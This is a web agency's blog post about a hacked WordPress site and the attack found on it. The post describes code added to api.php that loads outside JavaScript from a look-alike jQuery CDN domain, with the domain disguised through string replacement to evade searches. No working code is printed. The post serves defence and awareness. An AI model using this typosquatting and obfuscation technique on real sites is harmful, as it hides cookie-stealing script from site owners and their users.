The Battle Against the Hacks…

Alex Centeno

Director of Digital at AndiSites Inc.
Alex is AndiSites' Director of Digital. He writes on all things digital, including web design, development, SEO, online marketing, photography, and video.
Alex Centeno

If you are at all related to the web world, you will inevitably come in contact with WordPress; the beautifully-designed, easy to use content management system that is our favorite here at AndiSites. According to W3Techs, WordPress is now estimated to be used in 58.9% of content management system websites and in 25.7% of all websites.1

Since WordPress is the most popular CMS, hackers can target low-quality implementations (including weak installations and unsupported versions) in order to gain an edge. Hence the importance of making sure your WordPress website is developed and supported by skilled professionals, and that core security and plugin updates are made regularly. 

The most recent vulnerability we discovered

A new client of ours sought help from AndiSites because they were seeing errors and experiencing problems with their site.

The vulnerability that we discovered was likely installed via a Gravity Forms plugin that hadn’t been updated to the latest version. We have heard of past hackers gaining access through Gravity Forms, and thankfully the folks at Rocketgenius (the plugin’s provider) address those vulnerabilities the moment they find them. Gravity Forms is included in many websites since it is a powerful, highly customizable form builder plugin that not only collects information but also integrates with lots of third-party database services. Unfortunately, some websites do not keep up with the latest security updates and put themselves at potential risk of getting hacked.

The actual code

In the hack mentioned above, the code implanted is added at the bottom of the api.php file. The hack mainly consists of a set of routines that enqueue an external javascript to be included in the normal calls. It is hard to detect because the domain of the external javascript is very similar to the domain of valid external libraries called in public CDNs. In this case the hacker used a call to a domain very similar to code.jquery.com — he instead registered a domain: jqeury.org and then created a subdomain code.jqeury.org, which is easy to miss by just looking at the source code of the page.

Most importantly, you can’t just look for the reference in your installation because they use a PHP string replace function (they don’t write it out directly in the code). In this case, they used: “j..q..e..u..r..y…o..r..g” as part of the string, and then removed the dots with string replace (as in the example below).

ss1

Why did the hacker do this on our client’s site? It’s impossible to know for sure, but, for example, enqueing an external JavaScript that steals a login cookie can be used maliciously for all sorts of things. In an e-commerce cart site it can be used to obtain access to sensitive information including digital download products, customer information, and much more.

The moral of the story

I don’t want to beat a dead horse reminding you again about the importance of a support plan with a reputable Wordress agency, but I want to encourage you to make the security of your website a priority. Security is a vital part of every website, and at AndiSites we build security into every website we do and provide support plans that give you peace of mind post-launch.

 

1. http://w3techs.com/technologies/details/cm-wordpress/all/all

Back to Blog